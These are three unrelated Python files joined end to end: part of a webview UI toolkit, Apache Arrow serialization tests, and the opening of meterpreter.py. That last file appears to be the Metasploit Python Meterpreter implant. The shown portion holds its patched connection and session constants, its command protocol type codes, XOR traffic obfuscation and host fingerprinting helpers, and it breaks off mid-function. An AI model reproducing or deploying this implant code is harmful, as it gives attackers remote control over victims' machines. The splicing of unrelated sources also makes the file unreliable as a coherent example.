raise Exception('JavaScript error:\n' + json.dumps(params[0], indent=2))
def on_load(self, params):
self._enable_js_library('local:hammer')
super().__init__(self, id='App')
def on_app_close(self):
close_handler = getattr(self, 'on_close', None)
if callable(close_handler):
close_handler()
def on_window_resize(self, params):
self.width, self.height = float(self.webview.eval_js('window.innerWidth')), float(self.webview.eval_js('window.innerHeight'))
def apply_theme(self):
self.background_color = self.theme.background
def _add_child_for(self, child, parent):
if parent is child: return
if child not in parent.children:
parent.children.append(child)
js = JSWrapper(self.webview)
parent_elem = js.by_id(parent.id)
parent_elem.append(child.render())
self._all_views_by_id[child.id] = child
def _remove_child_from(self, child, parent):
if parent is child: return
parent.children.remove(child)
js = JSWrapper(self.webview)
child_elem = js.by_id(child.id)
child_elem.remove()
def _update_all_dependencies(self, changed_view):
try:
changed_view.on_resize()
except: pass
if len(changed_view.children) + len(changed_view._dependents) == 0:
return
seen_deps = set()
seen_views = set()
deps_per_view = {}
visit_queue = [changed_view]
update_queue = []
while visit_queue:
view = visit_queue.pop(0)
seen_views.add(view)
visit_queue += [ child_view for child_view in view.children if child_view not in seen_views]
for dep_view, dep_prop in view._dependents:
if dep_view not in seen_views:
visit_queue.append(dep_view)
deps_per_view.setdefault(dep_view, []).append(dep_prop)
try:
update_queue.remove(dep_view)
except ValueError: pass
update_queue.append(dep_view)
for dep_view in update_queue:
for dep_prop in deps_per_view[dep_view]:
dep_view._refresh(dep_prop)
try:
dep_view.update_layout()
except AttributeError:
pass
for view in update_queue:
try:
view.on_resize()
except: pass
def _enable_js_library(self, library_name):
if library_name in self._enabled_js_libraries:
return
if library_name.startswith('local:'):
abs_root_path = os.path.dirname(__file__)
start_path = f"{abs_root_path}/resources/js/{library_name[len('local:'):]}"
for extension in ['','.min.js','.js']:
lib_path = start_path + extension
if os.path.exists(lib_path):
break
with open(lib_path, 'r') as f:
script_code = f.read()
#script_code += '\nvar hammertime = new Hammer(document.body); var youey_handlers = {};\n'
self.webview.eval_js(script_code)
#JSWrapper(self.webview).dot('head').append(js)
self._enabled_js_libraries.add(library_name)
if webview_provider == 'Pythonista':
import ui
class CloseCatcher(ui.View):
def __init__(self, app, **kwargs):
self.app = app
super().__init__(**kwargs)
def will_close(self):
self.app.on_app_close()
class App(AppBase):
fullscreen_default = True
event_prefix = 'youey-event:'
callback_code = 'window.location.href="youey-event:" + encodeURIComponent(JSON.stringify(package));'
def open_webview(self, title, html):
close_catcher = CloseCatcher(self)
wv = self.webview = ui.WebView(frame=close_catcher.bounds, flex='WH')
close_catcher.add_subview(wv)
wv.background_color = self.default_theme.background.hex
wv.scales_page_to_fit = False
wv.objc_instance.subviews()[0].subviews()[0].setScrollEnabled(False)
wv.delegate = self
wv.load_html(html)
kwargs = {
'animated': False,
'title_bar_color': wv.background_color
}
if self._fullscreen:
kwargs['hide_title_bar'] = True
close_catcher.present('full_screen', **kwargs)
else:
close_catcher.present()
def webview_should_start_load(self, webview, url, nav_type):
if url.startswith(self.event_prefix):
event_info = json.loads(unquote(url[len(self.event_prefix):]))
event = event_info['event']
params = event_info['params']
self._handle_event_callback(event, params)
return False
return True
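# Illustrative note (not part of the original module): on Pythonista the JS side raises
# events by navigating to event_prefix plus a URL-encoded JSON package, e.g. (the 'tap'
# event and 'View1' id are hypothetical):
#
#   window.location.href = "youey-event:" +
#       encodeURIComponent(JSON.stringify({event: "tap", params: ["View1", {}]}));
#
# webview_should_start_load() above decodes this and routes it through
# _handle_event_callback(event, params).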
elif webview_provider == 'pywebview':
import webview, threading
class Api:
def __init__(self, app):
self.app = app
def youey_event(self, package):
event_name = package['event']
params = package['params']
self.app._handle_event_callback(event_name, params)
class App(AppBase):
fullscreen_default = False
callback_code = 'window.pywebview.api.youey_event(package);'
def open_webview(self, title, html):
with open('youey/main-ui-pywebview.html', 'w', encoding='utf-8') as actual_html_file:
actual_html_file.write(html)
self.html = html
self.webview = self
#t = threading.Thread(target=self.ensur)
#t.start()
webview.create_window(
title, url='youey/main-ui-pywebview.html', js_api=Api(self), fullscreen=self._fullscreen, background_color=self.default_theme.background.hex)
self.on_app_close()
def eval_js(self, js):
return webview.evaluate_js(js, 'master')
if __name__ == '__main__':
pass
|
test_serialization.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import division
import pytest
from collections import namedtuple, OrderedDict, defaultdict
import datetime
import os
import string
import sys
import pyarrow as pa
import numpy as np
try:
import torch
except ImportError:
torch = None
# Blacklist the module in case `import torch` is costly before
# failing (ARROW-2071)
sys.modules['torch'] = None
def assert_equal(obj1, obj2):
if torch is not None and torch.is_tensor(obj1) and torch.is_tensor(obj2):
assert torch.equal(obj1, obj2)
return
module_numpy = (type(obj1).__module__ == np.__name__ or
type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ()) or
(hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently np.testing.assert_equal
# fails because we do not properly handle different numerical
# types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) ==
set(list(obj2.__dict__.keys()) + special_keys)), ("Objects {} "
"and {} are "
"different."
.format(
obj1,
obj2))
try:
# Workaround to make comparison of OrderedDicts work on Python 2.7
if obj1 == obj2:
return
except Exception:
pass
if obj1.__dict__ == {}:
print("WARNING: Empty dict in ", obj1)
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples with "
"different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (pa.lib.is_named_tuple(type(obj1)) or
pa.lib.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), ("Objects {} and {} are named tuples "
"with different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, ("Objects {} and {} are different."
.format(obj1, obj2))
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 999,
[1 << 100, [1 << 100]], "a", string.printable, "\u262F",
"hello world", u"hello world", u"\xff\xfe\x9c\x001\x000\x00",
None, True, False, [], (), {}, {(1, 2): 1}, {(): 2},
[1, "hello", 3.0], u"\u262F", 42.0, (1.0, "hi"),
[1, 2, 3, None], [(None,), 3, 1.0], ["h", "e", "l", "l", "o", None],
(None, None), ("hello", None), (True, False),
{True: "hello", False: "world"}, {"hello": "world", 1: 42, 2.5: 45},
{"hello": set([2, 3]), "world": set([42.0]), "this": None},
np.int8(3), np.int32(4), np.int64(5),
np.uint8(3), np.uint32(4), np.uint64(5), np.float16(1.9), np.float32(1.9),
np.float64(1.9), np.zeros([8, 20]),
np.random.normal(size=[17, 10]), np.array(["hi", 3]),
np.array(["hi", 3], dtype=object),
np.random.normal(size=[15, 13]).T,
]
if sys.version_info >= (3, 0):
PRIMITIVE_OBJECTS += [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
PRIMITIVE_OBJECTS += [long(42), long(1 << 62), long(0), # noqa
np.array([["hi", u"hi"],
[1.3, long(1)]])] # noqa
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{"obj{}".format(i): np.random.normal(size=[4, 4]) for i in range(5)},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
((((((((((),),),),),),),),),),
{"a": {"b": {"c": {"d": {}}}}},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(1), Foo(42)]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class SubQuxPickle(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = namedtuple("Point", ["x", "y"])
NamedTupleExample = namedtuple("Example",
"field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [Exception("Test object."), CustomError(), Point(11, y=22),
Foo(), Bar(), Baz(), Qux(), SubQux(), SubQuxPickle(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
OrderedDict([("hello", 1), ("world", 2)])]
def make_serialization_context():
context = pa.default_serialization_context()
context.register_type(Foo, "Foo")
context.register_type(Bar, "Bar")
context.register_type(Baz, "Baz")
context.register_type(Qux, "Quz")
context.register_type(SubQux, "SubQux")
context.register_type(SubQuxPickle, "SubQuxPickle", pickle=True)
context.register_type(Exception, "Exception")
context.register_type(CustomError, "CustomError")
context.register_type(Point, "Point")
context.register_type(NamedTupleExample, "NamedTupleExample")
return context
global_serialization_context = make_serialization_context()
def serialization_roundtrip(value, scratch_buffer,
context=global_serialization_context):
writer = pa.FixedSizeBufferWriter(scratch_buffer)
pa.serialize_to(value, writer, context=context)
reader = pa.BufferReader(scratch_buffer)
result = pa.deserialize_from(reader, None, context=context)
assert_equal(value, result)
_check_component_roundtrip(value, context=context)
def _check_component_roundtrip(value, context=global_serialization_context):
# Test to/from components
serialized = pa.serialize(value, context=context)
components = serialized.to_components()
from_comp = pa.SerializedPyObject.from_components(components)
recons = from_comp.deserialize(context=context)
assert_equal(value, recons)
@pytest.yield_fixture(scope='session')
def large_buffer(size=32*1024*1024):
return pa.allocate_buffer(size)
def large_memory_map(tmpdir_factory, size=100*1024*1024):
path = (tmpdir_factory.mktemp('data')
.join('pyarrow-serialization-tmp-file').strpath)
# Create a large memory mapped file
with open(path, 'wb') as f:
f.write(np.random.randint(0, 256, size=size)
.astype('u1')
.tobytes()
[:size])
return path
def test_clone():
context = pa.SerializationContext()
class Foo(object):
pass
def custom_serializer(obj):
return 0
def custom_deserializer(serialized_obj):
return (serialized_obj, 'a')
context.register_type(Foo, 'Foo', custom_serializer=custom_serializer,
custom_deserializer=custom_deserializer)
new_context = context.clone()
f = Foo()
serialized = pa.serialize(f, context=context)
deserialized = serialized.deserialize(context=context)
assert deserialized == (0, 'a')
serialized = pa.serialize(f, context=new_context)
deserialized = serialized.deserialize(context=new_context)
assert deserialized == (0, 'a')
def test_primitive_serialization(large_buffer):
for obj in PRIMITIVE_OBJECTS:
serialization_roundtrip(obj, large_buffer)
serialization_roundtrip(obj, large_buffer,
pa.pandas_serialization_context())
def test_serialize_to_buffer():
for nthreads in [1, 4]:
for value in COMPLEX_OBJECTS:
buf = pa.serialize(value).to_buffer(nthreads=nthreads)
result = pa.deserialize(buf)
assert_equal(value, result)
def test_complex_serialization(large_buffer):
for obj in COMPLEX_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_custom_serialization(large_buffer):
for obj in CUSTOM_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_default_dict_serialization(large_buffer):
pytest.importorskip("cloudpickle")
obj = defaultdict(lambda: 0, [("hello", 1), ("world", 2)])
serialization_roundtrip(obj, large_buffer)
def test_numpy_serialization(large_buffer):
for t in ["bool", "int8", "uint8", "int16", "uint16", "int32",
"uint32", "float16", "float32", "float64"]:
obj = np.random.randint(0, 10, size=(100, 100)).astype(t)
serialization_roundtrip(obj, large_buffer)
def test_datetime_serialization(large_buffer):
data = [
# Principia Mathematica published
datetime.datetime(year=1687, month=7, day=5),
# Some random date
datetime.datetime(year=1911, month=6, day=3, hour=4,
minute=55, second=44),
# End of WWI
datetime.datetime(year=1918, month=11, day=11),
# Beginning of UNIX time
datetime.datetime(year=1970, month=1, day=1),
# The Berlin wall falls
datetime.datetime(year=1989, month=11, day=9),
# Another random date
datetime.datetime(year=2011, month=6, day=3, hour=4,
minute=0, second=3),
# Another random date
datetime.datetime(year=1970, month=1, day=3, hour=4,
minute=0, second=0)
]
for d in data:
serialization_roundtrip(d, large_buffer)
def test_torch_serialization(large_buffer):
pytest.importorskip("torch")
serialization_context = pa.default_serialization_context()
pa.register_torch_serialization_handlers(serialization_context)
# These are the only types that are supported for the
# PyTorch to NumPy conversion
for t in ["float32", "float64",
"uint8", "int16", "int32", "int64"]:
obj = torch.from_numpy(np.random.randn(1000).astype(t))
serialization_roundtrip(obj, large_buffer,
context=serialization_context)
def test_numpy_immutable(large_buffer):
obj = np.zeros([10])
writer = pa.FixedSizeBufferWriter(large_buffer)
pa.serialize_to(obj, writer, global_serialization_context)
reader = pa.BufferReader(large_buffer)
result = pa.deserialize_from(reader, None, global_serialization_context)
with pytest.raises(ValueError):
result[0] = 1.0
# see https://issues.apache.org/jira/browse/ARROW-1695
def test_serialization_callback_numpy():
class DummyClass(object):
pass
def serialize_dummy_class(obj):
x = np.zeros(4)
return x
def deserialize_dummy_class(serialized_obj):
return serialized_obj
context = pa.default_serialization_context()
context.register_type(DummyClass, "DummyClass",
custom_serializer=serialize_dummy_class,
custom_deserializer=deserialize_dummy_class)
pa.serialize(DummyClass(), context=context)
def test_buffer_serialization():
class BufferClass(object):
pass
def serialize_buffer_class(obj):
return pa.frombuffer(b"hello")
def deserialize_buffer_class(serialized_obj):
return serialized_obj
context = pa.default_serialization_context()
context.register_type(
BufferClass, "BufferClass",
custom_serializer=serialize_buffer_class,
custom_deserializer=deserialize_buffer_class)
b = pa.serialize(BufferClass(), context=context).to_buffer()
assert pa.deserialize(b, context=context).to_pybytes() == b"hello"
@pytest.mark.skip(reason="extensive memory requirements")
def test_arrow_limits(self):
def huge_memory_map(temp_dir):
return large_memory_map(temp_dir, 100 * 1024 * 1024 * 1024)
with pa.memory_map(huge_memory_map, mode="r+") as mmap:
# Test that objects that are too large for Arrow throw a Python
# exception. These tests give out of memory errors on Travis and need
# to be run on a machine with lots of RAM.
x = 2 ** 29 * [1.0]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * ["s"]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * [["1"], 2, 3, [{"s": 4}]]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * [{"s": 1}] + 2 ** 29 * [1.0]
serialization_roundtrip(x, mmap)
del x
x = np.zeros(2 ** 25)
serialization_roundtrip(x, mmap)
del x
x = [np.zeros(2 ** 18) for _ in range(2 ** 7)]
serialization_roundtrip(x, mmap)
del x
def test_serialization_callback_error():
class TempClass(object):
pass
# Pass a SerializationContext into serialize, but TempClass
# is not registered
serialization_context = pa.SerializationContext()
val = TempClass()
with pytest.raises(pa.SerializationCallbackError) as err:
serialized_object = pa.serialize(val, serialization_context)
assert err.value.example_object == val
serialization_context.register_type(TempClass, 20*b"\x00")
serialized_object = pa.serialize(TempClass(), serialization_context)
deserialization_context = pa.SerializationContext()
# Pass a Serialization Context into deserialize, but TempClass
# is not registered
with pytest.raises(pa.DeserializationCallbackError) as err:
serialized_object.deserialize(deserialization_context)
assert err.value.type_id == 20*b"\x00"
def test_fallback_to_subclasses():
class SubFoo(Foo):
def __init__(self):
Foo.__init__(self)
# should be able to serialize/deserialize an instance
# if a base class has been registered
serialization_context = pa.SerializationContext()
serialization_context.register_type(Foo, "Foo")
subfoo = SubFoo()
# should fall back to the Foo serializer
serialized_object = pa.serialize(subfoo, serialization_context)
reconstructed_object = serialized_object.deserialize(
serialization_context
)
assert type(reconstructed_object) == Foo
class Serializable(object):
pass
def serialize_serializable(obj):
return {"type": type(obj), "data": obj.__dict__}
def deserialize_serializable(obj):
val = obj["type"].__new__(obj["type"])
val.__dict__.update(obj["data"])
return val
class SerializableClass(Serializable):
def __init__(self):
self.value = 3
def test_serialize_subclasses():
# This test shows how subclasses can be handled in an idiomatic way
# by having only a serializer for the base class
# This technique should however be used with care, since pickling
# type(obj) with cloudpickle will include the full class definition
# in the serialized representation.
# This means the class definition is part of every instance of the
# object, which in general is not desirable; registering all subclasses
# with register_type will result in faster and more memory
# efficient serialization.
context = pa.default_serialization_context()
context.register_type(
Serializable, "Serializable",
custom_serializer=serialize_serializable,
custom_deserializer=deserialize_serializable)
a = SerializableClass()
serialized = pa.serialize(a, context=context)
deserialized = serialized.deserialize(context=context)
assert type(deserialized).__name__ == SerializableClass.__name__
assert deserialized.value == 3
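# Illustrative sketch (an assumption, not part of the original test suite): per the note
# above, registering the subclass directly avoids embedding its class definition in every
# serialized payload.
#
#   direct_context = pa.default_serialization_context()
#   direct_context.register_type(SerializableClass, "SerializableClass")
#   buf = pa.serialize(SerializableClass(), context=direct_context).to_buffer()
#   assert pa.deserialize(buf, context=direct_context).value == 3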
def test_serialize_to_components_invalid_cases():
buf = pa.frombuffer(b'hello')
components = {
'num_tensors': 0,
'num_buffers': 1,
'data': [buf]
}
with pytest.raises(pa.ArrowException):
pa.deserialize_components(components)
components = {
'num_tensors': 1,
'num_buffers': 0,
'data': [buf, buf]
}
with pytest.raises(pa.ArrowException):
pa.deserialize_components(components)
@pytest.mark.skipif(os.name == 'nt', reason="deserialize_regex not pickleable")
def test_deserialize_in_different_process():
from multiprocessing import Process, Queue
import re
regex = re.compile(r"\d+\.\d*")
serialization_context = pa.SerializationContext()
serialization_context.register_type(type(regex), "Regex", pickle=True)
serialized = pa.serialize(regex, serialization_context)
serialized_bytes = serialized.to_buffer().to_pybytes()
def deserialize_regex(serialized, q):
import pyarrow as pa
q.put(pa.deserialize(serialized))
q = Queue()
p = Process(target=deserialize_regex, args=(serialized_bytes, q))
p.start()
assert q.get().pattern == regex.pattern
p.join()
def test_deserialize_buffer_in_different_process():
import tempfile
import subprocess
f = tempfile.NamedTemporaryFile(delete=False)
b = pa.serialize(pa.frombuffer(b'hello')).to_buffer()
f.write(b.to_pybytes())
f.close()
dir_path = os.path.dirname(os.path.realpath(__file__))
python_file = os.path.join(dir_path, 'deserialize_buffer.py')
subprocess.check_call([sys.executable, python_file, f.name])
def test_set_pickle():
# Use a custom type to trigger pickling.
class Foo(object):
pass
context = pa.SerializationContext()
context.register_type(Foo, 'Foo', pickle=True)
test_object = Foo()
# Define a custom serializer and deserializer to use in place of pickle.
def dumps1(obj):
return b'custom'
def loads1(serialized_obj):
return serialized_obj + b' serialization 1'
# Test that setting a custom pickler changes the behavior.
context.set_pickle(dumps1, loads1)
serialized = pa.serialize(test_object, context=context).to_buffer()
deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
assert deserialized == b'custom serialization 1'
# Define another custom serializer and deserializer.
def dumps2(obj):
return b'custom'
def loads2(serialized_obj):
return serialized_obj + b' serialization 2'
# Test that setting another custom pickler changes the behavior again.
context.set_pickle(dumps2, loads2)
serialized = pa.serialize(test_object, context=context).to_buffer()
deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
assert deserialized == b'custom serialization 2'
|
meterpreter.py
|
#!/usr/bin/python
# vim: tabstop=4 softtabstop=4 shiftwidth=4 noexpandtab
import binascii
import code
import os
import platform
import random
import re
import select
import socket
import struct
import subprocess
import sys
import threading
import time
import traceback
try:
import ctypes
except ImportError:
has_windll = False
else:
has_windll = hasattr(ctypes, 'windll')
try:
urllib_imports = ['ProxyHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
if sys.version_info[0] < 3:
urllib = __import__('urllib2', fromlist=urllib_imports)
else:
urllib = __import__('urllib.request', fromlist=urllib_imports)
except ImportError:
has_urllib = False
else:
has_urllib = True
if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
# reseed the random generator.
random.seed()
#
# Constants
#
# these values will be patched, DO NOT CHANGE THEM
DEBUGGING = False
HTTP_CONNECTION_URL = None
HTTP_PROXY = None
HTTP_USER_AGENT = None
PAYLOAD_UUID = ''
SESSION_COMMUNICATION_TIMEOUT = 300
SESSION_EXPIRATION_TIMEOUT = 604800
SESSION_RETRY_TOTAL = 3600
SESSION_RETRY_WAIT = 10
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
EXPORTED_SYMBOLS = {}
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
class SYSTEM_INFO(ctypes.Structure):
_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
("wReserved", ctypes.c_uint16),
("dwPageSize", ctypes.c_uint32),
("lpMinimumApplicationAddress", ctypes.c_void_p),
("lpMaximumApplicationAddress", ctypes.c_void_p),
("dwActiveProcessorMask", ctypes.c_uint32),
("dwNumberOfProcessors", ctypes.c_uint32),
("dwProcessorType", ctypes.c_uint32),
("dwAllocationGranularity", ctypes.c_uint32),
("wProcessorLevel", ctypes.c_uint16),
("wProcessorRevision", ctypes.c_uint16)]
def rand_xor_key():
return tuple(random.randint(1, 255) for _ in range(4))
def xor_bytes(key, data):
if sys.version_info[0] < 3:
dexored = ''.join(chr(ord(data[i]) ^ key[i % len(key)]) for i in range(len(data)))
else:
dexored = bytes(data[i] ^ key[i % len(key)] for i in range(len(data)))
return dexored
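# Illustrative sketch (not part of the original payload): how the 4-byte XOR key is
# framed and later recovered, mirroring Transport.send_packet() and the transports'
# _get_packet() methods below. `payload` stands for any bytes value.
#
#   xor_key = rand_xor_key()
#   framed = struct.pack('BBBB', *xor_key[::-1]) + xor_bytes(xor_key, payload)
#   recovered_key = struct.unpack('BBBB', framed[:4][::-1])
#   assert xor_bytes(recovered_key, framed[4:]) == payload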
def export(symbol):
EXPORTED_SYMBOLS[symbol.__name__] = symbol
return symbol
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in range(32))
@export
def crc16(data):
poly = 0x1021
reg = 0x0000
if is_str(data):
data = list(map(ord, data))
elif is_bytes(data):
data = list(data)
data.append(0)
data.append(0)
for byte in data:
mask = 0x80
while mask > 0:
reg <<= 1
if byte & mask:
reg += 1
mask >>= 1
if reg > 0xffff:
reg &= 0xffff
reg ^= poly
return reg
@export
def debug_print(msg):
if DEBUGGING:
print(msg)
@export
def error_result(exception=None):
if not exception:
_, exception, _ = sys.exc_info()
exception_crc = crc16(exception.__class__.__name__)
if exception_crc == 0x4cb2: # WindowsError
return error_result_windows(exception.errno)
else:
result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON)
return result
@export
def error_result_windows(error_number=None):
if not has_windll:
return ERROR_FAILURE
if error_number == None:
error_number = ctypes.windll.kernel32.GetLastError()
if error_number > 0xffff:
return ERROR_FAILURE
result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
return result
@export
def get_hdd_label():
for _, _, files in os.walk('/dev/disk/by-id/'):
for f in files:
for p in ['ata-', 'mb-']:
if f[:len(p)] == p:
return f[len(p):]
return ''
@export
def get_native_arch():
arch = get_system_arch()
if arch == 'x64' and ctypes.sizeof(ctypes.c_void_p) == 4:
arch = 'x86'
return arch
@export
def get_system_arch():
uname_info = platform.uname()
arch = uname_info[4]
if has_windll:
sysinfo = SYSTEM_INFO()
ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
values = {0:'x86', 5:'armle', 6:'IA64', 9:'x64'}
arch = values.get(sysinfo.wProcessorArchitecture, uname_info[4])
if arch == 'x86_64':
arch = 'x64'
return arch
@export
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
